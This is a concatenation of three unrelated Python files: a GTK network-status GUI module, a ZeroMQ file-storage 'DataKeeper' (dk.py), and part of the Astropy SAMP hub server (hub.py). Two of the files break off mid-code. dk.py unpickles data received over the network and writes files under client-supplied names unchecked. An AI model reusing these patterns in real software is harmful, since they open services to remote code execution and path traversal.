import cairo import gi import threading import time gi.require_version('Gtk', '3.0') gi.require_version('Gdk', '3.0') from gi.repository import Gtk from gi.repository import Gdk from gi.repository.GdkPixbuf import Pixbuf, InterpType from sand.gui_module import GUIComponent from sand.modules.network.sensor import NetworkDevices, NetworkDeviceIO import os import pkg_resources class SandNetworkGui(GUIComponent): def __init__(self, configuration="configuration.yaml"): GUIComponent.__init__(self, "{}/{}".format(__package__, configuration)) self._network_devices = NetworkDevices() self._network_devices.read() stat_script = pkg_resources.resource_filename(__name__, self.configuration["statistics-script"]) self._network_io = NetworkDeviceIO(self._network_devices.data, stat_script) self._labels_interfaces_status = dict() self._images_interfaces_status = dict() for interface in self.configuration["interfaces"]["ethernet"]: self._labels_interfaces_status[interface] = None self._images_interfaces_status[interface] = None self.current_drawing_offset = self.configuration["start-drawing-offset"] self._module_color = "#{}".format(self.configuration["module-color"]) self._thread_refresh = None def create_icon(self): label_description = Gtk.Label() label_description.set_markup("<span foreground='{}'><i><big><b>{}</b></big></i></span>".format(self._module_color, self.configuration["description"])) self.layout.put(label_description, self.configuration["description-position-x"], self.configuration["description-position-y"]) image = Gtk.Image() icon_filepath = pkg_resources.resource_filename(__name__, self.configuration["icon-filename"]) pixbuf = Pixbuf.new_from_file(icon_filepath) image.set_from_pixbuf(pixbuf.scale_simple(self.configuration["icon-dimension-x"], self.configuration["icon-dimension-y"], InterpType.BILINEAR)) self.layout.put(image, self.configuration["icon-position-x"], self.configuration["icon-position-y"]) def build(self): self.create_icon() self._build_ethernet_gui() self._build_wifi_gui() self._thread_refresh = threading.Thread(target=self.refresh, args=()) self._thread_refresh.setDaemon(True) self._thread_refresh.start() def _build_ethernet_gui(self): system_devices = self._network_devices.read() for interface in self.configuration["interfaces"]["ethernet"]: if interface in system_devices: status = system_devices[interface] label = Gtk.Label() self._set_ethernet_status(interface, status) if "disconnected" in status.lower(): label.set_markup("<span foreground='{}'><i><b>{} : </b></i></span><span foreground='#{}'><b>{}</b></span>".format(self._module_color, interface, self.configuration["disconnection-color"], status)) else: label.set_markup("<span foreground='{}'><i><b>{} : </b></i><b>{}</b></span>".format(self._module_color, interface, status)) self.layout.put(label, self.configuration["left-padding-interface-status"]+self.configuration["interface-status-dimension-x"]+5, self.current_drawing_offset + int(self.configuration["interface-status-dimension-y"]/6)) self.current_drawing_offset += self.configuration["horizontal-spacing"] self.current_drawing_offset += self.configuration["interface-status-dimension-x"]-10 self._labels_interfaces_status[interface] = label def _set_ethernet_status(self, inteface, status): image = Gtk.Image() if "disconnected" in status.lower(): icon_filepath = pkg_resources.resource_filename(__name__, self.configuration["ethernet-down-icon-filename"]) else: icon_filepath = pkg_resources.resource_filename(__name__, self.configuration["ethernet-up-icon-filename"]) pixbuf = Pixbuf.new_from_file(icon_filepath) image.set_from_pixbuf(pixbuf.scale_simple(self.configuration["interface-status-dimension-x"], self.configuration["interface-status-dimension-y"], InterpType.BILINEAR)) self.layout.put(image, self.configuration["left-padding-interface-status"], self.current_drawing_offset) self._images_interfaces_status[inteface] = image def _set_wifi_status(self, inteface, status): image = Gtk.Image() if "disconnected" in status.lower(): icon_filepath = pkg_resources.resource_filename(__name__, self.configuration["wifi-down-icon-filename"]) else: icon_filepath = pkg_resources.resource_filename(__name__, self.configuration["wifi-up-icon-filename"]) pixbuf = Pixbuf.new_from_file(icon_filepath) image.set_from_pixbuf(pixbuf.scale_simple(self.configuration["interface-status-dimension-x"], self.configuration["interface-status-dimension-y"], InterpType.BILINEAR)) self.layout.put(image, self.configuration["left-padding-interface-status"], self.current_drawing_offset) self._images_interfaces_status[inteface] = image def _build_wifi_gui(self): system_devices = self._network_devices.read() for interface in self.configuration["interfaces"]["wifi"]: if interface in system_devices: status = system_devices[interface] label = Gtk.Label() self._set_wifi_status(interface, status) if "disconnected" in status.lower(): label.set_markup("<span foreground='{}'><i><b>{} : </b></i></span><span foreground='#0003d1'><b>{}</b></span>".format(self._module_color, interface, status)) else: label.set_markup("<span foreground='{}'><i><b>{} : </b></i><b>{}</b></span>".format(self._module_color, interface, status)) self.layout.put(label, self.configuration["left-padding-interface-status"]+self.configuration["interface-status-dimension-x"]+5, self.current_drawing_offset + int(self.configuration["interface-status-dimension-y"]/6)) self.current_drawing_offset += self.configuration["horizontal-spacing"] self.current_drawing_offset += self.configuration["interface-status-dimension-x"]-10 self._labels_interfaces_status[interface] = label def refresh(self): while True: time.sleep(self.configuration["refresh-time"])
dk.py
# -*- coding: utf-8 -*- """ Created on Sat Mar 7 13:07:34 2020 @author: somar """ import zmq import os import time from multiprocessing import Process connectionPort="tcp://192.168.195.156:" masterport="tcp://127.0.0.1:" class DataKeeper: i_Am_Alive_port="5400" replicationPort="5200" context = zmq.Context() def __init__(self, ID, port): self.ID = ID self.clientport=port self.mastersuccessport = port[:-2] + str(int(port[-2]) + 1) + port[-1] ################################# def HeartBeat(self): socket = self.context.socket(zmq.PUB) socket.connect(masterport+self.i_Am_Alive_port) while True: messagedata = connectionPort[:-1] socket.send_string(messagedata) time.sleep(.5) ##################################### def UploadFile(self,message): name=message['fileName'] print(name+"/n") file=message['File'] f=open(name,'wb') f.write(file) f.close() print("datakeeper:video %s added on machine no %d successfully ^_^ /n" %(name,self.ID)) return True ###################################### def DownloadFile(self,message,socket): print("d5lt el download") fileName=message['fileName'] f=open(fileName,"rb") v=f.read() message['File']=v socket.send_pyobj(message) print("video downloaded 😊 /n") f.close() return True ############################################ def ConnectToClient(self): socket = self.context.socket(zmq.PAIR) socket.bind(connectionPort+self.clientport) mastersocket = self.context.socket(zmq.PUSH) mastersocket.bind(connectionPort+self.mastersuccessport) while True: # print("my client port: ",self.clientport) message=socket.recv_pyobj() print("keeper received from client /n") Type=message['Type'] success=False clientSuccessPort=message['successport'] if(Type==1): success= self.UploadFile(message) if(success): msg={'success':True,'successPort':clientSuccessPort} mastersocket.send_pyobj(msg) print("success message sent to master") else: success=self.DownloadFile(message,socket) if(success): msg={'success':True,'successPort':clientSuccessPort} mastersocket.send_pyobj(msg) print("success message sent to master") ############################### def SendReplica(self): master_socket = self.context.socket(zmq.PAIR) master_socket.bind(connectionPort+self.replicationPort) while True: message=master_socket.recv_pyobj() print("keeper received replica req from master ") print(message) ip=message['ip'] message['successport']="" message['Type']=1 replica_socket=self.context.socket(zmq.PAIR) replica_socket.connect(ip) success=False success=self.DownloadFile(message,replica_socket) if(success): msg={'success':True,'successPort':""} master_socket.send_pyobj(msg) replica_socket.close() ################################## # creating processes d1=DataKeeper(1,"5510") d2=DataKeeper(2,"5511") d3=DataKeeper(3,"5512") p1 = Process(target = d1.ConnectToClient) p2 = Process(target = d2.ConnectToClient) p3 = Process(target = d3.ConnectToClient) h1 = Process(target = d1.HeartBeat) r1 = Process(target=d2.SendReplica) # starting processes h1.start() r1.start() p1.start() p2.start() p3.start() # joining processes h1.join() r1.join() p1.join() p2.join() p3.join()
hub.py
# Licensed under a 3-clause BSD style license - see LICENSE.rst import copy import os import select import socket import threading import time import uuid import warnings import queue import xmlrpc.client as xmlrpc from urllib.parse import urlunparse from astropy import log from .constants import SAMP_STATUS_OK from .constants import __profile_version__ from .errors import SAMPWarning, SAMPHubError, SAMPProxyError from .utils import internet_on, ServerProxyPool, _HubAsClient from .lockfile_helpers import read_lockfile, create_lock_file from .standard_profile import ThreadingXMLRPCServer from .web_profile import WebProfileXMLRPCServer, web_profile_text_dialog __all__ = ['SAMPHubServer', 'WebProfileDialog'] __doctest_skip__ = ['.', 'SAMPHubServer.*'] class SAMPHubServer: """ SAMP Hub Server. Parameters ---------- secret : str, optional The secret code to use for the SAMP lockfile. If none is is specified, the :func:`uuid.uuid1` function is used to generate one. addr : str, optional Listening address (or IP). This defaults to 127.0.0.1 if the internet is not reachable, otherwise it defaults to the host name. port : int, optional Listening XML-RPC server socket port. If left set to 0 (the default), the operating system will select a free port. lockfile : str, optional Custom lockfile name. timeout : int, optional Hub inactivity timeout. If ``timeout > 0`` then the Hub automatically stops after an inactivity period longer than ``timeout`` seconds. By default ``timeout`` is set to 0 (Hub never expires). client_timeout : int, optional Client inactivity timeout. If ``client_timeout > 0`` then the Hub automatically unregisters the clients which result inactive for a period longer than ``client_timeout`` seconds. By default ``client_timeout`` is set to 0 (clients never expire). mode : str, optional Defines the Hub running mode. If ``mode`` is ``'single'`` then the Hub runs using the standard ``.samp`` lock-file, having a single instance for user desktop session. Otherwise, if ``mode`` is ``'multiple'``, then the Hub runs using a non-standard lock-file, placed in ``.samp-1`` directory, of the form ``samp-hub-<UUID>``, where ``<UUID>`` is a unique UUID assigned to the hub. label : str, optional A string used to label the Hub with a human readable name. This string is written in the lock-file assigned to the ``hub.label`` token. web_profile : bool, optional Enables or disables the Web Profile support. web_profile_dialog : class, optional Allows a class instance to be specified using ``web_profile_dialog`` to replace the terminal-based message with e.g. a GUI pop-up. Two `queue.Queue` instances will be added to the instance as attributes ``queue_request`` and ``queue_result``. When a request is received via the ``queue_request`` queue, the pop-up should be displayed, and a value of `True` or `False` should be added to ``queue_result`` depending on whether the user accepted or refused the connection. web_port : int, optional The port to use for web SAMP. This should not be changed except for testing purposes, since web SAMP should always use port 21012. pool_size : int, optional The number of socket connections opened to communicate with the clients. """ def __init__(self, secret=None, addr=None, port=0, lockfile=None, timeout=0, client_timeout=0, mode='single', label="", web_profile=True, web_profile_dialog=None, web_port=21012, pool_size=20): # Generate random ID for the hub self._id = str(uuid.uuid1()) # General settings self._is_running = False self._customlockfilename = lockfile self._lockfile = None self._addr = addr self._port = port self._mode = mode self._label = label self._timeout = timeout self._client_timeout = client_timeout self._pool_size = pool_size # Web profile specific attributes self._web_profile = web_profile self._web_profile_dialog = web_profile_dialog self._web_port = web_port self._web_profile_server = None self._web_profile_callbacks = {} self._web_profile_requests_queue = None self._web_profile_requests_result = None self._web_profile_requests_semaphore = None self._host_name = "127.0.0.1" if internet_on(): try: self._host_name = socket.getfqdn() socket.getaddrinfo(self._addr or self._host_name, self._port or 0) except socket.error: self._host_name = "127.0.0.1" # Threading stuff self._thread_lock = threading.Lock() self._thread_run = None self._thread_hub_timeout = None self._thread_client_timeout = None self._launched_threads = [] # Variables for timeout testing: self._last_activity_time = None self._client_activity_time = {} # Hub message id counter, used to create hub msg ids self._hub_msg_id_counter = 0 # Hub secret code self._hub_secret_code_customized = secret self._hub_secret = self._create_secret_code() # Hub public id (as SAMP client) self._hub_public_id = "" # Client ids # {private_key: (public_id, timestamp)} self._private_keys = {} # Metadata per client # {private_key: metadata} self._metadata = {} # List of subscribed clients per MType # {mtype: private_key list} self._mtype2ids = {} # List of subscribed MTypes per client # {private_key: mtype list} self._id2mtypes = {} # List of XML-RPC addresses per client # {public_id: (XML-RPC address, ServerProxyPool instance)} self._xmlrpc_endpoints = {} # Synchronous message id heap self._sync_msg_ids_heap = {} # Public ids counter self._client_id_counter = -1 @property def id(self): """ The unique hub ID. """ return self._id def _register_standard_api(self, server): # Standard Profile only operations server.register_function(self._ping, 'samp.hub.ping') server.register_function(self._set_xmlrpc_callback, 'samp.hub.setXmlrpcCallback') # Standard API operations server.register_function(self._register, 'samp.hub.register') server.register_function(self._unregister, 'samp.hub.unregister') server.register_function(self._declare_metadata, 'samp.hub.declareMetadata') server.register_function(self._get_metadata, 'samp.hub.getMetadata') server.register_function(self._declare_subscriptions, 'samp.hub.declareSubscriptions') server.register_function(self._get_subscriptions, 'samp.hub.getSubscriptions') server.register_function(self._get_registered_clients, 'samp.hub.getRegisteredClients') server.register_function(self._get_subscribed_clients, 'samp.hub.getSubscribedClients') server.register_function(self._notify, 'samp.hub.notify') server.register_function(self._notify_all, 'samp.hub.notifyAll') server.register_function(self._call, 'samp.hub.call') server.register_function(self._call_all, 'samp.hub.callAll') server.register_function(self._call_and_wait, 'samp.hub.callAndWait') server.register_function(self._reply, 'samp.hub.reply') def _register_web_profile_api(self, server): # Web Profile methods like Standard Profile server.register_function(self._ping, 'samp.webhub.ping') server.register_function(self._unregister, 'samp.webhub.unregister') server.register_function(self._declare_metadata, 'samp.webhub.declareMetadata') server.register_function(self._get_metadata, 'samp.webhub.getMetadata') server.register_function(self._declare_subscriptions, 'samp.webhub.declareSubscriptions') server.register_function(self._get_subscriptions, 'samp.webhub.getSubscriptions') server.register_function(self._get_registered_clients, 'samp.webhub.getRegisteredClients') server.register_function(self._get_subscribed_clients, 'samp.webhub.getSubscribedClients') server.register_function(self._notify, 'samp.webhub.notify') server.register_function(self._notify_all, 'samp.webhub.notifyAll') server.register_function(self._call, 'samp.webhub.call') server.register_function(self._call_all, 'samp.webhub.callAll') server.register_function(self._call_and_wait, 'samp.webhub.callAndWait') server.register_function(self._reply, 'samp.webhub.reply') # Methods particularly for Web Profile server.register_function(self._web_profile_register, 'samp.webhub.register') server.register_function(self._web_profile_allowReverseCallbacks, 'samp.webhub.allowReverseCallbacks') server.register_function(self._web_profile_pullCallbacks, 'samp.webhub.pullCallbacks') def _start_standard_server(self): self._server = ThreadingXMLRPCServer( (self._addr or self._host_name, self._port or 0), log, logRequests=False, allow_none=True) prot = 'http' self._port = self._server.socket.getsockname()[1] addr = "{0}:{1}".format(self._addr or self._host_name, self._port) self._url = urlunparse((prot, addr, '', '', '', '')) self._server.register_introspection_functions() self._register_standard_api(self._server) def _start_web_profile_server(self): self._web_profile_requests_queue = queue.Queue(1) self._web_profile_requests_result = queue.Queue(1) self._web_profile_requests_semaphore = queue.Queue(1) if self._web_profile_dialog is not None: # TODO: Some sort of duck-typing on the web_profile_dialog object self._web_profile_dialog.queue_request = \ self._web_profile_requests_queue self._web_profile_dialog.queue_result = \ self._web_profile_requests_result try: self._web_profile_server = WebProfileXMLRPCServer( ('localhost', self._web_port), log, logRequests=False, allow_none=True) self._web_port = self._web_profile_server.socket.getsockname()[1] self._web_profile_server.register_introspection_functions() self._register_web_profile_api(self._web_profile_server) log.info("Hub set to run with Web Profile support enabled.") except socket.error: log.warning("Port {0} already in use. Impossible to run the " "Hub with Web Profile support.".format(self._web_port), SAMPWarning) self._web_profile = False # Cleanup self._web_profile_requests_queue = None self._web_profile_requests_result = None self._web_profile_requests_semaphore = None def _launch_thread(self, group=None, target=None, name=None, args=None): # Remove inactive threads remove = [] for t in self._launched_threads: if not t.is_alive(): remove.append(t) for t in remove: self._launched_threads.remove(t) # Start new thread t = threading.Thread(group=group, target=target, name=name, args=args) t.start() # Add to list of launched threads self._launched_threads.append(t) def _join_launched_threads(self, timeout=None): for t in self._launched_threads: t.join(timeout=timeout) def _timeout_test_hub(self): if self._timeout == 0: return last = time.time() while self._is_running: time.sleep(0.05) # keep this small to check _is_running often now = time.time() if now - last > 1.: with self._thread_lock: if self._last_activity_time is not None: if now - self._last_activity_time >= self._timeout: warnings.warn("Timeout expired, Hub is shutting down!", SAMPWarning) self.stop() return last = now def _timeout_test_client(self): if self._client_timeout == 0: return last = time.time() while self._is_running: time.sleep(0.05) # keep this small to check _is_running often now = time.time() if now - last > 1.: for private_key in self._client_activity_time.keys(): if (now - self._client_activity_time[private_key] > self._client_timeout and private_key != self._hub_private_key): warnings.warn( "Client {} timeout expired!".format(private_key), SAMPWarning) self._notify_disconnection(private_key) self._unregister(private_key) last = now def _hub_as_client_request_handler(self, method, args): if method == 'samp.client.receiveCall': return self._receive_call(*args) elif method == 'samp.client.receiveNotification': return self._receive_notification(*args) elif method == 'samp.client.receiveResponse': return self._receive_response(*args) elif method == 'samp.app.ping': return self._ping(*args) def _setup_hub_as_client(self): hub_metadata = {"samp.name": "Astropy SAMP Hub", "samp.description.text": self._label, "author.name": "The Astropy Collaboration", "samp.documentation.url": "http://docs.astropy.org/en/stable/samp", "samp.icon.url": self._url + "/samp/icon"} result = self._register(self._hub_secret) self._hub_public_id = result["samp.self-id"] self._hub_private_key = result["samp.private-key"] self._set_xmlrpc_callback(self._hub_private_key, self._url) self._declare_metadata(self._hub_private_key, hub_metadata) self._declare_subscriptions(self._hub_private_key, {"samp.app.ping": {}, "x-samp.query.by-meta": {}}) def start(self, wait=False): """ Start the current SAMP Hub instance and create the lock file. Hub start-up can be blocking or non blocking depending on the ``wait`` parameter. Parameters ---------- wait : bool If `True` then the Hub process is joined with the caller, blocking the code flow. Usually `True` option is used to run a stand-alone Hub in an executable script. If `False` (default), then the Hub process runs in a separated thread. `False` is usually used in a Python shell. """ if self._is_running: raise SAMPHubError("Hub is already running") if self._lockfile is not None: raise SAMPHubError("Hub is not running but lockfile is set") if self._web_profile: self._start_web_profile_server() self._start_standard_server() self._lockfile = create_lock_file(lockfilename=self._customlockfilename, mode=self._mode, hub_id=self.id, hub_params=self.params) self._update_last_activity_time() self._setup_hub_as_client() self._start_threads() log.info("Hub started") if wait and self._is_running: self._thread_run.join() self._thread_run = None @property def params(self): """ The hub parameters (which are written to the logfile) """ params = {} # Keys required by standard profile params['samp.secret'] = self._hub_secret params['samp.hub.xmlrpc.url'] = self._url params['samp.profile.version'] = __profile_version__ # Custom keys params['hub.id'] = self.id params['hub.label'] = self._label or "Hub {0}".format(self.id) return params def _start_threads(self): self._thread_run = threading.Thread(target=self._serve_forever) self._thread_run.daemon = True if self._timeout > 0: self._thread_hub_timeout = threading.Thread( target=self._timeout_test_hub, name="Hub timeout test") self._thread_hub_timeout.daemon = True else: self._thread_hub_timeout = None if self._client_timeout > 0: self._thread_client_timeout = threading.Thread( target=self._timeout_test_client, name="Client timeout test") self._thread_client_timeout.daemon = True else: self._thread_client_timeout = None self._is_running = True self._thread_run.start() if self._thread_hub_timeout is not None: self._thread_hub_timeout.start() if self._thread_client_timeout is not None: self._thread_client_timeout.start() def _create_secret_code(self): if self._hub_secret_code_customized is not None: return self._hub_secret_code_customized else: return str(uuid.uuid1()) def stop(self): """ Stop the current SAMP Hub instance and delete the lock file. """ if not self._is_running: return log.info("Hub is stopping...") self._notify_shutdown() self._is_running = False if self._lockfile and os.path.isfile(self._lockfile): lockfiledict = read_lockfile(self._lockfile) if lockfiledict['samp.secret'] == self._hub_secret: os.remove(self._lockfile) self._lockfile = None # Reset variables # TODO: What happens if not all threads are stopped after timeout? self._join_all_threads(timeout=10.) self._hub_msg_id_counter = 0 self._hub_secret = self._create_secret_code() self._hub_public_id = "" self._metadata = {} self._private_keys = {} self._mtype2ids = {} self._id2mtypes = {} self._xmlrpc_endpoints = {} self._last_activity_time = None log.info("Hub stopped.") def _join_all_threads(self, timeout=None): # In some cases, ``stop`` may be called from some of the sub-threads, # so we just need to make sure that we don't try and shut down the # calling thread. current_thread = threading.current_thread() if self._thread_run is not current_thread: self._thread_run.join(timeout=timeout) if not self._thread_run.is_alive(): self._thread_run = None if self._thread_hub_timeout is not None and self._thread_hub_timeout is not current_thread: self._thread_hub_timeout.join(timeout=timeout) if not self._thread_hub_timeout.is_alive(): self._thread_hub_timeout = None if self._thread_client_timeout is not None and self._thread_client_timeout is not current_thread: self._thread_client_timeout.join(timeout=timeout) if not self._thread_client_timeout.is_alive(): self._thread_client_timeout = None self._join_launched_threads(timeout=timeout) @property def is_running(self): """Return an information concerning the Hub running status. Returns ------- running : bool Is the hub running? """ return self._is_running def _serve_forever(self): while self._is_running: try: read_ready = select.select([self._server.socket], [], [], 0.01)[0] except OSError as exc: warnings.warn("Call to select() in SAMPHubServer failed: {0}".format(exc), SAMPWarning) else: if read_ready: self._server.handle_request() if self._web_profile: # We now check if there are any connection requests from the # web profile, and if so, we initialize the pop-up. if self._web_profile_dialog is None: try: request = self._web_profile_requests_queue.get_nowait() except queue.Empty: pass else: web_profile_text_dialog(request, self._web_profile_requests_result) # We now check for requests over the web profile socket, and we # also update the pop-up in case there are any changes. try: read_ready = select.select([self._web_profile_server.socket], [], [], 0.01)[0] except OSError as exc: warnings.warn("Call to select() in SAMPHubServer failed: {0}".format(exc), SAMPWarning) else: if read_ready: self._web_profile_server.handle_request() self._server.server_close() if self._web_profile_server is not None: self._web_profile_server.server_close() def _notify_shutdown(self): msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.event.shutdown") for mtype in msubs: if mtype in self._mtype2ids: for key in self._mtype2ids[mtype]: self._notify_(self._hub_private_key, self._private_keys[key][0], {"samp.mtype": "samp.hub.event.shutdown", "samp.params": {}}) def _notify_register(self, private_key): msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.event.register") for mtype in msubs: if mtype in self._mtype2ids: public_id = self._private_keys[private_key][0] for key in self._mtype2ids[mtype]: # if key != private_key: self._notify(self._hub_private_key, self._private_keys[key][0], {"samp.mtype": "samp.hub.event.register", "samp.params": {"id": public_id}}) def _notify_unregister(self, private_key): msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.event.unregister") for mtype in msubs: if mtype in self._mtype2ids: public_id = self._private_keys[private_key][0] for key in self._mtype2ids[mtype]: if key != private_key: self._notify(self._hub_private_key, self._private_keys[key][0], {"samp.mtype": "samp.hub.event.unregister", "samp.params": {"id": public_id}}) def _notify_metadata(self, private_key): msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.event.metadata") for mtype in msubs: if mtype in self._mtype2ids: public_id = self._private_keys[private_key][0] for key in self._mtype2ids[mtype]: # if key != private_key: self._notify(self._hub_private_key, self._private_keys[key][0], {"samp.mtype": "samp.hub.event.metadata", "samp.params": {"id": public_id, "metadata": self._metadata[private_key]} }) def _notify_subscriptions(self, private_key): msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.event.subscriptions") for mtype in msubs: if mtype in self._mtype2ids: public_id = self._private_keys[private_key][0] for key in self._mtype2ids[mtype]: self._notify(self._hub_private_key, self._private_keys[key][0], {"samp.mtype": "samp.hub.event.subscriptions", "samp.params": {"id": public_id, "subscriptions": self._id2mtypes[private_key]} }) def _notify_disconnection(self, private_key): def _xmlrpc_call_disconnect(endpoint, private_key, hub_public_id, message): endpoint.samp.client.receiveNotification(private_key, hub_public_id, message) msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.disconnect") public_id = self._private_keys[private_key][0] endpoint = self._xmlrpc_endpoints[public_id][1] for mtype in msubs: if mtype in self._mtype2ids and private_key in self._mtype2ids[mtype]: log.debug("notify disconnection to {}".format(public_id)) self._launch_thread(target=_xmlrpc_call_disconnect, args=(endpoint, private_key, self._hub_public_id, {"samp.mtype": "samp.hub.disconnect", "samp.params": {"reason": "Timeout expired!"}})) def _ping(self): self._update_last_activity_time() log.debug("ping") return "1" def _query_by_metadata(self, key, value): public_id_list = [] for private_id in self._metadata: if key in self._metadata[private_id]: if self._metadata[private_id][key] == value: public_id_list.append(self._private_keys[private_id][0]) return public_id_list def _set_xmlrpc_callback(self, private_key, xmlrpc_addr): self._update_last_activity_time(private_key) if private_key in self._private_keys: if private_key == self._hub_private_key: public_id = self._private_keys[private_key][0] self._xmlrpc_endpoints[public_id] = \ (xmlrpc_addr, _HubAsClient(self._hub_as_client_request_handler)) return "" # Dictionary stored with the public id log.debug("set_xmlrpc_callback: {} {}".format(private_key, xmlrpc_addr)) server_proxy_pool = None server_proxy_pool = ServerProxyPool(self._pool_size, xmlrpc.ServerProxy, xmlrpc_addr, allow_none=1) public_id = self._private_keys[private_key][0] self._xmlrpc_endpoints[public_id] = (xmlrpc_addr, server_proxy_pool) else: raise SAMPProxyError(5, "Private-key {} expired or invalid." .format(private_key)) return "" def _perform_standard_register(self): with self._thread_lock: private_key, public_id = self._get_new_ids() self._private_keys[private_key] = (public_id, time.time()) self._update_last_activity_time(private_key) self._notify_register(private_key) log.debug("register: private-key = {} and self-id = {}" .format(private_key, public_id)) return {"samp.self-id": public_id, "samp.private-key": private_key, "samp.hub-id": self._hub_public_id} def _register(self, secret): self._update_last_activity_time() if secret == self._hub_secret: return self._perform_standard_register() else: # return {"samp.self-id": "", "samp.private-key": "", "samp.hub-id": ""} raise SAMPProxyError(7, "Bad secret code") def _get_new_ids(self): private_key = str(uuid.uuid1()) self._client_id_counter += 1 public_id = 'cli#hub' if self._client_id_counter > 0: public_id = "cli#{}".format(self._client_id_counter) return private_key, public_id def _unregister(self, private_key): self._update_last_activity_time() public_key = "" self._notify_unregister(private_key) with self._thread_lock: if private_key in self._private_keys: public_key = self._private_keys[private_key][0] del self._private_keys[private_key] else: return "" if private_key in self._metadata: del self._metadata[private_key] if private_key in self._id2mtypes: del self._id2mtypes[private_key] for mtype in self._mtype2ids.keys(): if private_key in self._mtype2ids[mtype]: self._mtype2ids[mtype].remove(private_key) if public_key in self._xmlrpc_endpoints: del self._xmlrpc_endpoints[public_key] if private_key in self._client_activity_time: del self._client_activity_time[private_key] if self._web_profile: if private_key in self._web_profile_callbacks: del self._web_profile_callbacks[private_key] self._web_profile_server.remove_client(private_key) log.debug("unregister {} ({})".format(public_key, private_key)) return "" def _declare_metadata(self, private_key, metadata): self._update_last_activity_time(private_key) if private_key in self._private_keys: log.debug("declare_metadata: private-key = {} metadata = {}" .format(private_key, str(metadata))) self._metadata[private_key] = metadata self._notify_metadata(private_key) else: raise SAMPProxyError(5, "Private-key {} expired or invalid." .format(private_key)) return "" def _get_metadata(self, private_key, client_id): self._update_last_activity_time(private_key) if private_key in self._private_keys: client_private_key = self._public_id_to_private_key(client_id) log.debug("get_metadata: private-key = {} client-id = {}" .format(private_key, client_id)) if client_private_key is not None: if client_private_key in self._metadata: log.debug("--> metadata = {}" .format(self._metadata[client_private_key])) return self._metadata[client_private_key] else: return {} else: raise SAMPProxyError(6, "Invalid client ID") else: raise SAMPProxyError(5, "Private-key {} expired or invalid." .format(private_key)) def _declare_subscriptions(self, private_key, mtypes): self._update_last_activity_time(private_key) if private_key in self._private_keys: log.debug("declare_subscriptions: private-key = {} mtypes = {}" .format(private_key, str(mtypes))) # remove subscription to previous mtypes if private_key in self._id2mtypes: prev_mtypes = self._id2mtypes[private_key] for mtype in prev_mtypes: try: self._mtype2ids[mtype].remove(private_key) except ValueError: # private_key is not in list pass self._id2mtypes[private_key] = copy.deepcopy(mtypes) # remove duplicated MType for wildcard overwriting original_mtypes = copy.deepcopy(mtypes) for mtype in original_mtypes: if mtype.endswith("*"): for mtype2 in original_mtypes: if mtype2.startswith(mtype[:-1]) and \ mtype2 != mtype: if mtype2 in mtypes: del(mtypes[mtype2]) log.debug("declare_subscriptions: subscriptions accepted from " "{} => {}".format(private_key, str(mtypes))) for mtype in mtypes: if mtype in self._mtype2ids: if private_key not in self._mtype2ids[mtype]: self._mtype2ids[mtype].append(private_key) else: self._mtype2ids[mtype] = [private_key] self._notify_subscriptions(private_key) else: raise SAMPProxyError(5, "Private-key {} expired or invalid." .format(private_key)) return "" def _get_subscriptions(self, private_key, client_id): self._update_last_activity_time(private_key) if private_key in self._private_keys: client_private_key = self._public_id_to_private_key(client_id) if client_private_key is not None: if client_private_key in self._id2mtypes: log.debug("get_subscriptions: client-id = {} mtypes = {}" .format(client_id, str(self._id2mtypes[client_private_key]))) return self._id2mtypes[client_private_key] else: log.debug("get_subscriptions: client-id = {} mtypes = " "missing".format(client_id)) return {} else: raise SAMPProxyError(6, "Invalid client ID") else: raise SAMPProxyError(5, "Private-key {} expired or invalid." .format(private_key)) def _get_registered_clients(self, private_key): self._update_last_activity_time(private_key) if private_key in self._private_keys: reg_clients = [] for pkey in self._private_keys.keys(): if pkey != private_key: reg_clients.append(self._private_keys[pkey][0]) log.debug("get_registered_clients: private_key = {} clients = {}" .format(private_key, reg_clients)) return reg_clients else: raise SAMPProxyError(5, "Private-key {} expired or invalid." .format(private_key)) def _get_subscribed_clients(self, private_key, mtype): self._update_last_activity_time(private_key) if private_key in self._private_keys: sub_clients = {} for pkey in self._private_keys.keys(): if pkey != private_key and self._is_subscribed(pkey, mtype): sub_clients[self._private_keys[pkey][0]] = {} log.debug("get_subscribed_clients: private_key = {} mtype = {} " "clients = {}".format(private_key, mtype, sub_clients)) return sub_clients else: raise SAMPProxyError(5, "Private-key {} expired or invalid." .format(private_key)) @staticmethod def get_mtype_subtypes(mtype): """ Return a list containing all the possible wildcarded subtypes of MType. Parameters ---------- mtype : str MType to be parsed. Returns ------- types : list List of subtypes Examples -------- >>> from astropy.samp import SAMPHubServer >>> SAMPHubServer.get_mtype_subtypes("samp.app.ping") ['samp.app.ping', 'samp.app.*', 'samp.*', '*'] """ subtypes = [] msubs = mtype.split(".") indexes = list(range(len(msubs))) indexes.reverse() indexes.append(-1) for i in indexes: tmp_mtype = ".".join(msubs[:i + 1]) if tmp_mtype != mtype: if tmp_mtype != "": tmp_mtype = tmp_mtype + ".*" else: tmp_mtype = "*" subtypes.append(tmp_mtype) return subtypes def _is_subscribed(self, private_key, mtype): subscribed = False msubs = SAMPHubServer.get_mtype_subtypes(mtype) for msub in msubs: if msub in self._mtype2ids: if private_key in self._mtype2ids[msub]: subscribed = True return subscribed def _notify(self, private_key, recipient_id, message): self._update_last_activity_time(private_key) if private_key in self._private_keys: if self._is_subscribed(self._public_id_to_private_key(recipient_id), message["samp.mtype"]) is False: raise SAMPProxyError(2, "Client {} not subscribed to MType {}" .format(recipient_id, message["samp.mtype"])) self._launch_thread(target=self._notify_, args=(private_key, recipient_id, message)) return {} else: raise SAMPProxyError(5, "Private-key {} expired or invalid." .format(private_key)) def _notify_(self, sender_private_key, recipient_public_id, message): if sender_private_key not in self._private_keys: return sender_public_id = self._private_keys[sender_private_key][0] try: log.debug("notify {} from {} to {}".format( message["samp.mtype"], sender_public_id, recipient_public_id)) recipient_private_key = self._public_id_to_private_key(recipient_public_id) arg_params = (sender_public_id, message) samp_method_name = "receiveNotification" self._retry_method(recipient_private_key, recipient_public_id, samp_method_name, arg_params) except Exception as exc: warnings.warn("{} notification from client {} to client {} " "failed [{}]".format(message["samp.mtype"], sender_public_id, recipient_public_id, exc), SAMPWarning) def _notify_all(self, private_key, message): self._update_last_activity_time(private_key) if private_key in self._private_keys: if "samp.mtype" not in message: raise SAMPProxyError(3, "samp.mtype keyword is missing") 